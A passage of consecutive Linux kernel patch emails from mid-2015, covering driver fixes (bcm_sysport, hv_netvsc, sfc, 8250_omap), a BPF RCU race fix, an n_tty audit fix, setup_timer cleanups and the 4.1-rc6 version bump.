@@ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, unsigned int p_index; u16 len, status; struct bcm_rsb *rsb; - int ret; /* Determine how much we should process since last call */ p_index = rdma_readl(priv, RDMA_PROD_INDEX); @@ -605,13 +612,8 @@ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, while ((processed < to_process) && (processed < budget)) { cb = &priv->rx_cbs[priv->rx_read_ptr]; - skb = cb->skb; - - processed++; - priv->rx_read_ptr++; + skb = bcm_sysport_rx_refill(priv, cb); - if (priv->rx_read_ptr == priv->num_rx_bds) - priv->rx_read_ptr = 0; /* We do not have a backing SKB, so we do not a corresponding * DMA mapping for this incoming packet since @@ -622,12 +624,9 @@ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, netif_err(priv, rx_err, ndev, "out of memory!\n"); ndev->stats.rx_dropped++; ndev->stats.rx_errors++; - goto refill; + goto next; } - dma_unmap_single(kdev, dma_unmap_addr(cb, dma_addr), - RX_BUF_LENGTH, DMA_FROM_DEVICE); - /* Extract the Receive Status Block prepended */ rsb = (struct bcm_rsb *)skb->data; len = (rsb->rx_status_len >> DESC_LEN_SHIFT) & DESC_LEN_MASK; @@ -643,8 +642,8 @@ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, netif_err(priv, rx_status, ndev, "fragmented packet!\n"); ndev->stats.rx_dropped++; ndev->stats.rx_errors++; - bcm_sysport_free_cb(cb); - goto refill; + dev_kfree_skb_any(skb); + goto next; } if (unlikely(status & (RX_STATUS_ERR | RX_STATUS_OVFLOW))) { @@ -653,8 +652,8 @@ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, ndev->stats.rx_over_errors++; ndev->stats.rx_dropped++; ndev->stats.rx_errors++; - bcm_sysport_free_cb(cb); - goto refill; + dev_kfree_skb_any(skb); + goto next; } skb_put(skb, len); @@ -681,10 +680,12 @@ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, ndev->stats.rx_bytes += len; napi_gro_receive(&priv->napi, skb); -refill: - ret = bcm_sysport_rx_refill(priv, cb); - if (ret) - priv->mib.alloc_rx_buff_failed++; +next: + processed++; + priv->rx_read_ptr++; + + if (priv->rx_read_ptr == priv->num_rx_bds) + priv->rx_read_ptr = 0; } return processed; From 25977ac77d62b3de19908979ac84c8fd5809de6f Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Thu, 28 May 2015 15:24:44 -0700 Subject: [PATCH 522/872] net: systemport: Add a check for oversized packets Occasionnaly we may get oversized packets from the hardware which exceed the nomimal 2KiB buffer size we allocate SKBs with. Add an early check which drops the packet to avoid invoking skb_over_panic() and move on to processing the next packet. Signed-off-by: Florian Fainelli Signed-off-by: David S. Miller --- drivers/net/ethernet/broadcom/bcmsysport.c | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/drivers/net/ethernet/broadcom/bcmsysport.c b/drivers/net/ethernet/broadcom/bcmsysport.c index d777b0db9e63..909ad7a0d480 100644 --- a/drivers/net/ethernet/broadcom/bcmsysport.c +++ b/drivers/net/ethernet/broadcom/bcmsysport.c @@ -638,6 +638,14 @@ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, p_index, priv->rx_c_index, priv->rx_read_ptr, len, status); + if (unlikely(len > RX_BUF_LENGTH)) { + netif_err(priv, rx_status, ndev, "oversized packet\n"); + ndev->stats.rx_length_errors++; + ndev->stats.rx_errors++; + dev_kfree_skb_any(skb); + goto next; + } + if (unlikely(!(status & DESC_EOP) || !(status & DESC_SOP))) { netif_err(priv, rx_status, ndev, "fragmented packet!\n"); ndev->stats.rx_dropped++; From 282c320d33541d61f4ab91248448040c4ebab1fc Mon Sep 17 00:00:00 2001 From: Wang Long Date: Fri, 29 May 2015 01:02:08 +0000 Subject: [PATCH 523/872] netevent: remove automatic variable in register_netevent_notifier() Remove automatic variable 'err' in register_netevent_notifier() and return the result of atomic_notifier_chain_register() directly. Signed-off-by: Wang Long Signed-off-by: David S. Miller --- net/core/netevent.c | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/net/core/netevent.c b/net/core/netevent.c index f17ccd291d39..8b3bc4fac613 100644 --- a/net/core/netevent.c +++ b/net/core/netevent.c @@ -31,10 +31,7 @@ static ATOMIC_NOTIFIER_HEAD(netevent_notif_chain); */ int register_netevent_notifier(struct notifier_block *nb) { - int err; - - err = atomic_notifier_chain_register(&netevent_notif_chain, nb); - return err; + return atomic_notifier_chain_register(&netevent_notif_chain, nb); } EXPORT_SYMBOL_GPL(register_netevent_notifier); From 0a726c2b499e390b1c1fc3092bd789f2192a2d03 Mon Sep 17 00:00:00 2001 From: "K. Y. Srinivasan" Date: Thu, 28 May 2015 17:08:06 -0700 Subject: [PATCH 524/872] hv_netvsc: Allocate the receive buffer from the correct NUMA node Allocate the receive bufer from the NUMA node assigned to the primary channel. Signed-off-by: K. Y. Srinivasan Signed-off-by: David S. Miller --- drivers/net/hyperv/netvsc.c | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/drivers/net/hyperv/netvsc.c b/drivers/net/hyperv/netvsc.c index b0249685139c..d187965eba36 100644 --- a/drivers/net/hyperv/netvsc.c +++ b/drivers/net/hyperv/netvsc.c @@ -227,13 +227,18 @@ static int netvsc_init_buf(struct hv_device *device) struct netvsc_device *net_device; struct nvsp_message *init_packet; struct net_device *ndev; + int node; net_device = get_outbound_net_device(device); if (!net_device) return -ENODEV; ndev = net_device->ndev; - net_device->recv_buf = vzalloc(net_device->recv_buf_size); + node = cpu_to_node(device->channel->target_cpu); + net_device->recv_buf = vzalloc_node(net_device->recv_buf_size, node); + if (!net_device->recv_buf) + net_device->recv_buf = vzalloc(net_device->recv_buf_size); + if (!net_device->recv_buf) { netdev_err(ndev, "unable to allocate receive " "buffer of size %d\n", net_device->recv_buf_size); From 5defde5946676ee23cd6a9d0e1de899410f4a33f Mon Sep 17 00:00:00 2001 From: "K. Y. Srinivasan" Date: Thu, 28 May 2015 17:08:07 -0700 Subject: [PATCH 525/872] hv_netvsc: Allocate the sendbuf in a NUMA aware way Allocate the send buffer in a NUMA aware way. Signed-off-by: K. Y. Srinivasan Signed-off-by: David S. Miller --- drivers/net/hyperv/netvsc.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/net/hyperv/netvsc.c b/drivers/net/hyperv/netvsc.c index d187965eba36..06de98a05622 100644 --- a/drivers/net/hyperv/netvsc.c +++ b/drivers/net/hyperv/netvsc.c @@ -326,7 +326,9 @@ static int netvsc_init_buf(struct hv_device *device) /* Now setup the send buffer. */ - net_device->send_buf = vzalloc(net_device->send_buf_size); + net_device->send_buf = vzalloc_node(net_device->send_buf_size, node); + if (!net_device->send_buf) + net_device->send_buf = vzalloc(net_device->send_buf_size); if (!net_device->send_buf) { netdev_err(ndev, "unable to allocate send " "buffer of size %d\n", net_device->send_buf_size); From 6b6d00076bf33fd1bfc95fa44218a6a089bc249a Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Sun, 31 May 2015 09:27:29 +0200 Subject: [PATCH 526/872] ALSA: hda - Fix jack detection at resume with VT codecs VT202x codecs seem requiring some delay after the resume D0 power transition for making the jack detection working again. Without the delay soon after D0, the jack is always detected as unplugged. Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=98921 Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_via.c | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/sound/pci/hda/patch_via.c b/sound/pci/hda/patch_via.c index 31a95cca015d..bab6c04932aa 100644 --- a/sound/pci/hda/patch_via.c +++ b/sound/pci/hda/patch_via.c @@ -449,6 +449,15 @@ static int via_suspend(struct hda_codec *codec) return 0; } + +static int via_resume(struct hda_codec *codec) +{ + /* some delay here to make jack detection working (bko#98921) */ + msleep(10); + codec->patch_ops.init(codec); + regcache_sync(codec->core.regmap); + return 0; +} #endif #ifdef CONFIG_PM @@ -475,6 +484,7 @@ static const struct hda_codec_ops via_patch_ops = { .stream_pm = snd_hda_gen_stream_pm, #ifdef CONFIG_PM .suspend = via_suspend, + .resume = via_resume, .check_power_status = via_check_power_status, #endif }; From abf2e7d6e2e315b32ee00067a69aaad2cf4e1b3f Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Thu, 28 May 2015 19:26:02 -0700 Subject: [PATCH 527/872] bpf: add missing rcu protection when releasing programs from prog_array Normally the program attachment place (like sockets, qdiscs) takes care of rcu protection and calls bpf_prog_put() after a grace period. The programs stored inside prog_array may not be attached anywhere, so prog_array needs to take care of preserving rcu protection. Otherwise bpf_tail_call() will race with bpf_prog_put(). To solve that introduce bpf_prog_put_rcu() helper function and use it in 3 places where unattached program can decrement refcnt: closing program fd, deleting/replacing program in prog_array. Fixes: 04fd61ab36ec ("bpf: allow bpf programs to tail-call other bpf programs") Reported-by: Martin Schwidefsky Signed-off-by: Alexei Starovoitov Acked-by: Daniel Borkmann Signed-off-by: David S. Miller --- include/linux/bpf.h | 6 +++++- kernel/bpf/arraymap.c | 4 ++-- kernel/bpf/syscall.c | 19 ++++++++++++++++++- 3 files changed, 25 insertions(+), 4 deletions(-) diff --git a/include/linux/bpf.h b/include/linux/bpf.h index 8821b9a8689e..5f520f5f087e 100644 --- a/include/linux/bpf.h +++ b/include/linux/bpf.h @@ -123,7 +123,10 @@ struct bpf_prog_aux { const struct bpf_verifier_ops *ops; struct bpf_map **used_maps; struct bpf_prog *prog; - struct work_struct work; + union { + struct work_struct work; + struct rcu_head rcu; + }; }; struct bpf_array { @@ -153,6 +156,7 @@ void bpf_register_map_type(struct bpf_map_type_list *tl); struct bpf_prog *bpf_prog_get(u32 ufd); void bpf_prog_put(struct bpf_prog *prog); +void bpf_prog_put_rcu(struct bpf_prog *prog); struct bpf_map *bpf_map_get(struct fd f); void bpf_map_put(struct bpf_map *map); diff --git a/kernel/bpf/arraymap.c b/kernel/bpf/arraymap.c index 614bcd4c1d74..cb31229a6fa4 100644 --- a/kernel/bpf/arraymap.c +++ b/kernel/bpf/arraymap.c @@ -202,7 +202,7 @@ static int prog_array_map_update_elem(struct bpf_map *map, void *key, old_prog = xchg(array->prog + index, prog); if (old_prog) - bpf_prog_put(old_prog); + bpf_prog_put_rcu(old_prog); return 0; } @@ -218,7 +218,7 @@ static int prog_array_map_delete_elem(struct bpf_map *map, void *key) old_prog = xchg(array->prog + index, NULL); if (old_prog) { - bpf_prog_put(old_prog); + bpf_prog_put_rcu(old_prog); return 0; } else { return -ENOENT; diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c index 98a69bd83069..a1b14d197a4f 100644 --- a/kernel/bpf/syscall.c +++ b/kernel/bpf/syscall.c @@ -432,6 +432,23 @@ static void free_used_maps(struct bpf_prog_aux *aux) kfree(aux->used_maps); } +static void __prog_put_rcu(struct rcu_head *rcu) +{ + struct bpf_prog_aux *aux = container_of(rcu, struct bpf_prog_aux, rcu); + + free_used_maps(aux); + bpf_prog_free(aux->prog); +} + +/* version of bpf_prog_put() that is called after a grace period */ +void bpf_prog_put_rcu(struct bpf_prog *prog) +{ + if (atomic_dec_and_test(&prog->aux->refcnt)) { + prog->aux->prog = prog; + call_rcu(&prog->aux->rcu, __prog_put_rcu); + } +} + void bpf_prog_put(struct bpf_prog *prog) { if (atomic_dec_and_test(&prog->aux->refcnt)) { @@ -445,7 +462,7 @@ static int bpf_prog_release(struct inode *inode, struct file *filp) { struct bpf_prog *prog = filp->private_data; - bpf_prog_put(prog); + bpf_prog_put_rcu(prog); return 0; } From 9809889c708ebffe240608eef39b667082f2c945 Mon Sep 17 00:00:00 2001 From: Sebastian Andrzej Siewior Date: Wed, 20 May 2015 22:07:35 +0200 Subject: [PATCH 528/872] serial: 8250_omap: provide complete custom startup & shutdown callbacks The currently in-use port->startup and port->shutdown are "okay". The startup part for instance does the tiny omap extra part and invokes serial8250_do_startup() for the remaining pieces. The workflow in serial8250_do_startup() is okay except for the part where UART_RX is read without a check if there is something to read. I tried to workaround it in commit 0aa525d11859 ("tty: serial: 8250_core: read only RX if there is something in the FIFO") but then reverted it later in commit ca8bb4aefb9 ("serial: 8250: Revert "tty: serial: 8250_core: read only RX if there is something in the FIFO""). This is the second attempt to get it to work on older OMAPs without breaking other chips this time Peter Hurley suggested to pull in the few needed lines from serial8250_do_startup() and drop everything else that is not required including making it simpler like using just request_irq() instead the chain handler like it is doing now. So lets try that. Fixes: ca8bb4aefb93 ("serial: 8250: Revert "tty: serial: 8250_core: read only RX if there is something in the FIFO"") Tested-by: Tony Lindgren Signed-off-by: Sebastian Andrzej Siewior Signed-off-by: Greg Kroah-Hartman --- drivers/tty/serial/8250/8250_omap.c | 82 +++++++++++++++++++++++++---- 1 file changed, 73 insertions(+), 9 deletions(-) diff --git a/drivers/tty/serial/8250/8250_omap.c b/drivers/tty/serial/8250/8250_omap.c index 9289999cb7c6..dce1a23706e8 100644 --- a/drivers/tty/serial/8250/8250_omap.c +++ b/drivers/tty/serial/8250/8250_omap.c @@ -562,12 +562,36 @@ static irqreturn_t omap_wake_irq(int irq, void *dev_id) return IRQ_NONE; } +#ifdef CONFIG_SERIAL_8250_DMA +static int omap_8250_dma_handle_irq(struct uart_port *port); +#endif + +static irqreturn_t omap8250_irq(int irq, void *dev_id) +{ + struct uart_port *port = dev_id; + struct uart_8250_port *up = up_to_u8250p(port); + unsigned int iir; + int ret; + +#ifdef CONFIG_SERIAL_8250_DMA + if (up->dma) { + ret = omap_8250_dma_handle_irq(port); + return IRQ_RETVAL(ret); + } +#endif + + serial8250_rpm_get(up); + iir = serial_port_in(port, UART_IIR); + ret = serial8250_handle_irq(port, iir); + serial8250_rpm_put(up); + + return IRQ_RETVAL(ret); +} + static int omap_8250_startup(struct uart_port *port) { - struct uart_8250_port *up = - container_of(port, struct uart_8250_port, port); + struct uart_8250_port *up = up_to_u8250p(port); struct omap8250_priv *priv = port->private_data; - int ret; if (priv->wakeirq) { @@ -580,10 +604,31 @@ static int omap_8250_startup(struct uart_port *port) pm_runtime_get_sync(port->dev); - ret = serial8250_do_startup(port); - if (ret) + up->mcr = 0; + serial_out(up, UART_FCR, UART_FCR_CLEAR_RCVR | UART_FCR_CLEAR_XMIT); + + serial_out(up, UART_LCR, UART_LCR_WLEN8); + + up->lsr_saved_flags = 0; + up->msr_saved_flags = 0; + + if (up->dma) { + ret = serial8250_request_dma(up); + if (ret) { + dev_warn_ratelimited(port->dev, + "failed to request DMA\n"); + up->dma = NULL; + } + } + + ret = request_irq(port->irq, omap8250_irq, IRQF_SHARED, + dev_name(port->dev), port); + if (ret < 0) goto err; + up->ier = UART_IER_RLSI | UART_IER_RDI; + serial_out(up, UART_IER, up->ier); + #ifdef CONFIG_PM up->capabilities |= UART_CAP_RPM; #endif @@ -610,8 +655,7 @@ static int omap_8250_startup(struct uart_port *port) static void omap_8250_shutdown(struct uart_port *port) { - struct uart_8250_port *up = - container_of(port, struct uart_8250_port, port); + struct uart_8250_port *up = up_to_u8250p(port); struct omap8250_priv *priv = port->private_data; flush_work(&priv->qos_work); @@ -621,11 +665,24 @@ static void omap_8250_shutdown(struct uart_port *port) pm_runtime_get_sync(port->dev); serial_out(up, UART_OMAP_WER, 0); - serial8250_do_shutdown(port); + + up->ier = 0; + serial_out(up, UART_IER, 0); + + if (up->dma) + serial8250_release_dma(up); + + /* + * Disable break condition and FIFOs + */ + if (up->lcr & UART_LCR_SBC) + serial_out(up, UART_LCR, up->lcr & ~UART_LCR_SBC); + serial_out(up, UART_FCR, UART_FCR_CLEAR_RCVR | UART_FCR_CLEAR_XMIT); pm_runtime_mark_last_busy(port->dev); pm_runtime_put_autosuspend(port->dev); + free_irq(port->irq, port); if (priv->wakeirq) free_irq(priv->wakeirq, port); } @@ -974,6 +1031,13 @@ static inline int omap_8250_rx_dma(struct uart_8250_port *p, unsigned int iir) } #endif +static int omap8250_no_handle_irq(struct uart_port *port) +{ + /* IRQ has not been requested but handling irq? */ + WARN_ONCE(1, "Unexpected irq handling before port startup\n"); + return 0; +} + static int omap8250_probe(struct platform_device *pdev) { struct resource *regs = platform_get_resource(pdev, IORESOURCE_MEM, 0); @@ -1075,6 +1139,7 @@ static int omap8250_probe(struct platform_device *pdev) pm_runtime_get_sync(&pdev->dev); omap_serial_fill_features_erratas(&up, priv); + up.port.handle_irq = omap8250_no_handle_irq; #ifdef CONFIG_SERIAL_8250_DMA if (pdev->dev.of_node) { /* @@ -1088,7 +1153,6 @@ static int omap8250_probe(struct platform_device *pdev) ret = of_property_count_strings(pdev->dev.of_node, "dma-names"); if (ret == 2) { up.dma = &priv->omap8250_dma; - up.port.handle_irq = omap_8250_dma_handle_irq; priv->omap8250_dma.fn = the_no_dma_filter_fn; priv->omap8250_dma.tx_dma = omap_8250_tx_dma; priv->omap8250_dma.rx_dma = omap_8250_rx_dma; From 72586c6061ab8c23ffd9f301ed19782a44ff5f04 Mon Sep 17 00:00:00 2001 From: Laura Abbott Date: Thu, 14 May 2015 11:42:17 -0700 Subject: [PATCH 529/872] n_tty: Fix auditing support for cannonical mode MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Commit 32f13521ca68bc624ff6effc77f308a52b038bf0 ("n_tty: Line copy to user buffer in canonical mode") changed cannonical mode copying to use copy_to_user but missed adding the call to the audit framework. Add in the appropriate functions to get audit support. Fixes: 32f13521ca68 ("n_tty: Line copy to user buffer in canonical mode") Reported-by: Miloslav Trmač Signed-off-by: Laura Abbott Reviewed-by: Peter Hurley Cc: stable Signed-off-by: Greg Kroah-Hartman --- drivers/tty/n_tty.c | 17 ++++++++++++++--- 1 file changed, 14 insertions(+), 3 deletions(-) diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c index 759604e57b24..396344cb011f 100644 --- a/drivers/tty/n_tty.c +++ b/drivers/tty/n_tty.c @@ -162,6 +162,17 @@ static inline int tty_put_user(struct tty_struct *tty, unsigned char x, return put_user(x, ptr); } +static inline int tty_copy_to_user(struct tty_struct *tty, + void __user *to, + const void *from, + unsigned long n) +{ + struct n_tty_data *ldata = tty->disc_data; + + tty_audit_add_data(tty, to, n, ldata->icanon); + return copy_to_user(to, from, n); +} + /** * n_tty_kick_worker - start input worker (if required) * @tty: terminal @@ -2084,12 +2095,12 @@ static int canon_copy_from_read_buf(struct tty_struct *tty, __func__, eol, found, n, c, size, more); if (n > size) { - ret = copy_to_user(*b, read_buf_addr(ldata, tail), size); + ret = tty_copy_to_user(tty, *b, read_buf_addr(ldata, tail), size); if (ret) return -EFAULT; - ret = copy_to_user(*b + size, ldata->read_buf, n - size); + ret = tty_copy_to_user(tty, *b + size, ldata->read_buf, n - size); } else - ret = copy_to_user(*b, read_buf_addr(ldata, tail), n); + ret = tty_copy_to_user(tty, *b, read_buf_addr(ldata, tail), n); if (ret) return -EFAULT; From fe931229c61c04e0a7906c4ebef9623a4538a5ab Mon Sep 17 00:00:00 2001 From: Marc Zyngier Date: Wed, 22 Apr 2015 18:40:52 +0100 Subject: [PATCH 530/872] ARM: exynos: Fix wake-up interrupts for Exynos3250 Commit 8b283c025443 (ARM: exynos4/5: convert pmu wakeup to stacked domains) changed the Exynos PMU code to use stacked domains. This has led to a number of interrupt numbers to be fixed. In the meantime, support for Exynos 3250 was added, missing the required change to this platform. This amounts to revert ace283a04a4a (ARM: EXYNOS: Fix wrong hwirq of RTC interrupt for Exynos3250 SoC), as the initial patch was right, just a bit early... Cc: Chanwoo Choi Cc: Kyungmin Park Cc: Krzysztof Kozlowski Cc: Kukjin Kim Signed-off-by: Marc Zyngier Reviewed-by: Chanwoo Choi Signed-off-by: Krzysztof Kozlowski --- arch/arm/mach-exynos/suspend.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/arch/arm/mach-exynos/suspend.c b/arch/arm/mach-exynos/suspend.c index 3e6aea7f83af..40dce3628490 100644 --- a/arch/arm/mach-exynos/suspend.c +++ b/arch/arm/mach-exynos/suspend.c @@ -87,8 +87,8 @@ static unsigned int exynos_pmu_spare3; static u32 exynos_irqwake_intmask = 0xffffffff; static const struct exynos_wkup_irq exynos3250_wkup_irq[] = { - { 105, BIT(1) }, /* RTC alarm */ - { 106, BIT(2) }, /* RTC tick */ + { 73, BIT(1) }, /* RTC alarm */ + { 74, BIT(2) }, /* RTC tick */ { /* sentinel */ }, }; From 9eb0a5d1905235b968dce5c1fda294ac2663d840 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Fri, 29 May 2015 12:25:54 +0100 Subject: [PATCH 531/872] sfc: free multiple Rx buffers when required When Rx packet data must be dropped, all the buffers associated with that Rx packet must be freed. Extend and rename efx_free_rx_buffer() to efx_free_rx_buffers() and loop through all the fragments. By doing so this patch fixes a possible memory leak. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/rx.c | 42 +++++++++++++++++++++-------------- 1 file changed, 25 insertions(+), 17 deletions(-) diff --git a/drivers/net/ethernet/sfc/rx.c b/drivers/net/ethernet/sfc/rx.c index c0ad95d2f63d..809ea4610a77 100644 --- a/drivers/net/ethernet/sfc/rx.c +++ b/drivers/net/ethernet/sfc/rx.c @@ -224,12 +224,17 @@ static void efx_unmap_rx_buffer(struct efx_nic *efx, } } -static void efx_free_rx_buffer(struct efx_rx_buffer *rx_buf) +static void efx_free_rx_buffers(struct efx_rx_queue *rx_queue, + struct efx_rx_buffer *rx_buf, + unsigned int num_bufs) { - if (rx_buf->page) { - put_page(rx_buf->page); - rx_buf->page = NULL; - } + do { + if (rx_buf->page) { + put_page(rx_buf->page); + rx_buf->page = NULL; + } + rx_buf = efx_rx_buf_next(rx_queue, rx_buf); + } while (--num_bufs); } /* Attempt to recycle the page if there is an RX recycle ring; the page can @@ -278,7 +283,7 @@ static void efx_fini_rx_buffer(struct efx_rx_queue *rx_queue, /* If this is the last buffer in a page, unmap and free it. */ if (rx_buf->flags & EFX_RX_BUF_LAST_IN_PAGE) { efx_unmap_rx_buffer(rx_queue->efx, rx_buf); - efx_free_rx_buffer(rx_buf); + efx_free_rx_buffers(rx_queue, rx_buf, 1); } rx_buf->page = NULL; } @@ -304,10 +309,7 @@ static void efx_discard_rx_packet(struct efx_channel *channel, efx_recycle_rx_pages(channel, rx_buf, n_frags); - do { - efx_free_rx_buffer(rx_buf); - rx_buf = efx_rx_buf_next(rx_queue, rx_buf); - } while (--n_frags); + efx_free_rx_buffers(rx_queue, rx_buf, n_frags); } /** @@ -431,11 +433,10 @@ efx_rx_packet_gro(struct efx_channel *channel, struct efx_rx_buffer *rx_buf, skb = napi_get_frags(napi); if (unlikely(!skb)) { - while (n_frags--) { - put_page(rx_buf->page); - rx_buf->page = NULL; - rx_buf = efx_rx_buf_next(&channel->rx_queue, rx_buf); - } + struct efx_rx_queue *rx_queue; + + rx_queue = efx_channel_get_rx_queue(channel); + efx_free_rx_buffers(rx_queue, rx_buf, n_frags); return; } @@ -622,7 +623,10 @@ static void efx_rx_deliver(struct efx_channel *channel, u8 *eh, skb = efx_rx_mk_skb(channel, rx_buf, n_frags, eh, hdr_len); if (unlikely(skb == NULL)) { - efx_free_rx_buffer(rx_buf); + struct efx_rx_queue *rx_queue; + + rx_queue = efx_channel_get_rx_queue(channel); + efx_free_rx_buffers(rx_queue, rx_buf, n_frags); return; } skb_record_rx_queue(skb, channel->rx_queue.core_index); @@ -661,8 +665,12 @@ void __efx_rx_packet(struct efx_channel *channel) * loopback layer, and free the rx_buf here */ if (unlikely(efx->loopback_selftest)) { + struct efx_rx_queue *rx_queue; + efx_loopback_rx_packet(efx, eh, rx_buf->len); - efx_free_rx_buffer(rx_buf); + rx_queue = efx_channel_get_rx_queue(channel); + efx_free_rx_buffers(rx_queue, rx_buf, + channel->rx_pkt_n_frags); goto out; } From 3370e13aa463adb84488ebf0e599e3dc0024315b Mon Sep 17 00:00:00 2001 From: Sudeep Holla Date: Wed, 27 May 2015 11:26:13 +0100 Subject: [PATCH 532/872] drivers/base: cacheinfo: handle absence of caches On some simulators like GEM5, caches may not be simulated. In those cases, the cache levels and leaves will be zero and will result in following exception: Unable to handle kernel NULL pointer dereference at virtual address 0040 pgd = ffffffc0008fa000 [00000040] *pgd=00000009f6807003, *pud=00000009f6807003, *pmd=00000009f6808003, *pte=006000002c010707 Internal error: Oops: 96000005 [#1] PREEMPT SMP Modules linked in: CPU: 1 PID: 1 Comm: swapper/0 Not tainted 4.1.0-rc5 #198 task: ffffffc9768a0000 ti: ffffffc9768a8000 task.ti: ffffffc9768a8000 PC is at detect_cache_attributes+0x98/0x2c8 LR is at detect_cache_attributes+0x88/0x2c8 kcalloc(0) returns a special value ZERO_SIZE_PTR which is non-NULL value but results in fault only on any attempt to dereferencing it. So checking for the non-NULL pointer will not suffice. This patch checks for non-zero cache leaf nodes and returns error if there are no cache leaves in detect_cache_attributes. Cc: # 3.19.x Cc: Will Deacon Cc: Greg Kroah-Hartman Reported-by: William Wang Signed-off-by: Sudeep Holla Signed-off-by: Greg Kroah-Hartman --- drivers/base/cacheinfo.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/base/cacheinfo.c b/drivers/base/cacheinfo.c index 9c2ba1c97c42..df0c66cb7ad3 100644 --- a/drivers/base/cacheinfo.c +++ b/drivers/base/cacheinfo.c @@ -179,7 +179,7 @@ static int detect_cache_attributes(unsigned int cpu) { int ret; - if (init_cache_level(cpu)) + if (init_cache_level(cpu) || !cache_leaves(cpu)) return -ENOENT; per_cpu_cacheinfo(cpu) = kcalloc(cache_leaves(cpu), From c65b99f046843d2455aa231747b5a07a999a9f3d Mon Sep 17 00:00:00 2001 From: Linus Torvalds Date: Sun, 31 May 2015 19:01:07 -0700 Subject: [PATCH 533/872] Linux 4.1-rc6 --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index 92a707859205..aee7e5cb4c15 100644 --- a/Makefile +++ b/Makefile @@ -1,7 +1,7 @@ VERSION = 4 PATCHLEVEL = 1 SUBLEVEL = 0 -EXTRAVERSION = -rc5 +EXTRAVERSION = -rc6 NAME = Hurr durr I'ma sheep # *DOCUMENTATION* From 12d5e6fd1d66a8faa14e4922035bfed70bf014d5 Mon Sep 17 00:00:00 2001 From: Vaishali Thakkar Date: Mon, 1 Jun 2015 09:36:02 +0530 Subject: [PATCH 534/872] net: mv643xx_eth: Use setup_timer Use the timer API function setup_timer instead of structure field assignments to initialize a timer. A simplified version of the Coccinelle semantic patch that performs this transformation is as follows: @change@ expression e, func, da; @@ -init_timer (&e); +setup_timer (&e, func, da); -e.data = da; -e.function = func; Signed-off-by: Vaishali Thakkar Signed-off-by: David S. Miller --- drivers/net/ethernet/marvell/mv643xx_eth.c | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/marvell/mv643xx_eth.c b/drivers/net/ethernet/marvell/mv643xx_eth.c index 1c75829eb166..d52639bc491f 100644 --- a/drivers/net/ethernet/marvell/mv643xx_eth.c +++ b/drivers/net/ethernet/marvell/mv643xx_eth.c @@ -3125,9 +3125,8 @@ static int mv643xx_eth_probe(struct platform_device *pdev) mib_counters_clear(mp); - init_timer(&mp->mib_counters_timer); - mp->mib_counters_timer.data = (unsigned long)mp; - mp->mib_counters_timer.function = mib_counters_timer_wrapper; + setup_timer(&mp->mib_counters_timer, mib_counters_timer_wrapper, + (unsigned long)mp); mp->mib_counters_timer.expires = jiffies + 30 * HZ; spin_lock_init(&mp->mib_counters_lock); @@ -3136,9 +3135,7 @@ static int mv643xx_eth_probe(struct platform_device *pdev) netif_napi_add(dev, &mp->napi, mv643xx_eth_poll, NAPI_POLL_WEIGHT); - init_timer(&mp->rx_oom); - mp->rx_oom.data = (unsigned long)mp; - mp->rx_oom.function = oom_timer_wrapper; + setup_timer(&mp->rx_oom, oom_timer_wrapper, (unsigned long)mp); res = platform_get_resource(pdev, IORESOURCE_IRQ, 0); From 52e0b2b15bdbb605bf38b4ed9cdc5b46587b18d6 Mon Sep 17 00:00:00 2001 From: Vaishali Thakkar Date: Mon, 1 Jun 2015 09:55:10 +0530 Subject: [PATCH 535/872] net: dl2k: Use setup_timer Use the timer API function setup_timer instead of structure field assignments to initialize a timer. A simplified version of the Coccinelle semantic patch that performs this transformation is as follows: @change@ expression e1, e2, e3, e4, a, b; @@ -init_timer(&e1); +setup_timer(&e1, a, b); ... when != a = e2 when != b = e3 -e1.data = b; ... when != a = e4 -e1.function = a; Signed-off-by: Vaishali Thakkar Signed-off-by: David S. Miller --- drivers/net/ethernet/dlink/dl2k.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/drivers/net/ethernet/dlink/dl2k.c b/drivers/net/ethernet/dlink/dl2k.c index 1274b6fdac8a..cf0a5fcdaaaf 100644 --- a/drivers/net/ethernet/dlink/dl2k.c +++ b/drivers/net/ethernet/dlink/dl2k.c @@ -463,10 +463,8 @@ rio_open (struct net_device *dev) dw32(MACCtrl, dr32(MACCtrl) | AutoVLANuntagging); } - init_timer (&np->timer); + setup_timer(&np->timer, rio_timer, (unsigned long)dev); np->timer.expires = jiffies + 1*HZ; - np->timer.data = (unsigned long) dev; - np->timer.function = rio_timer; add_timer (&np->timer); /* Start Tx/Rx */ From a24c85abc0815c14d9e5266d06b9acd8a0a57b9a Mon Sep 17 00:00:00 2001 From: Vaishali Thakkar Date: Mon, 1 Jun 2015 07:10:15 +0530 Subject: [PATCH 536/872] isdn/capi: Use setup_timer Use the timer API function setup_timer instead of structure field assignments to initialize a timer. A simplified version of the Coccinelle semantic patch that performs this transformation is as follows: @change@ expression e1, e2, e3, e4, a, b; 